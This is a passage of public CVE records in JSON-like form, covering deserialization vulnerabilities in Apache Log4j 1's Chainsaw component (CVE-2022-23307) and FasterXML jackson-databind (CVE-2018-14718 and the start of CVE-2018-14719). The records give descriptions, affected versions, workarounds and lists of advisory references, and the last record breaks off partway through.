Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.", }, ], metrics: [ { other: { content: { other: "Critical", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-502", description: "CWE-502 Deserialization of Untrusted Data", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:49:30", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { discovery: "UNKNOWN", }, title: " A deserialization flaw in the Chainsaw component of Log4j 1 can lead to malicious code execution.", workarounds: [ { lang: "en", value: "Upgrade to Apache Log4j 2 and Apache Chainsaw 2.1.0.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2022-23307", STATE: "PUBLIC", TITLE: " A deserialization flaw in the Chainsaw component of Log4j 1 can lead to malicious code execution.", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j 1.x", version: { version_data: [ { version_affected: ">=", version_value: "1.2.1", }, { version_affected: "<=", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: "@kingkk", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. 
Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "Critical", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-502 Deserialization of Untrusted Data", }, ], }, ], }, references: { reference_data: [ { name: "https://logging.apache.org/log4j/1.2/index.html", refsource: "MISC", url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", refsource: "MISC", url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Upgrade to Apache Log4j 2 and Apache Chainsaw 2.1.0.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2022-23307", datePublished: "2022-01-18T15:25:23", dateReserved: "2022-01-17T00:00:00", dateUpdated: "2024-08-03T03:36:20.396Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14718
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.347Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. 
FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "106601", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/106601", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: 
[ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ 
"x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[druid-commits] 20210324 [GitHub] [druid] jihoonson opened a new pull request #11030: Suppress cves", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], 
providerMetadata: { dateUpdated: "2021-03-25T00:06:19", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. 
FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "106601", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/106601", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: 
"https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ 
"x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[druid-commits] 20210324 [GitHub] [druid] jihoonson opened a new pull request #11030: Suppress cves", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14718", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, 
CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "106601", refsource: "BID", url: "http://www.securityfocus.com/bid/106601", }, { name: "RHSA-2019:0877", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "RHSA-2019:1782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", refsource: 
"REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "RHSA-2019:3140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: 
"https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[druid-commits] 20210324 [GitHub] [druid] jihoonson opened a new pull request #11030: Suppress cves", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: 
"8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14718", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.347Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14719
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.192Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", 
], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", 
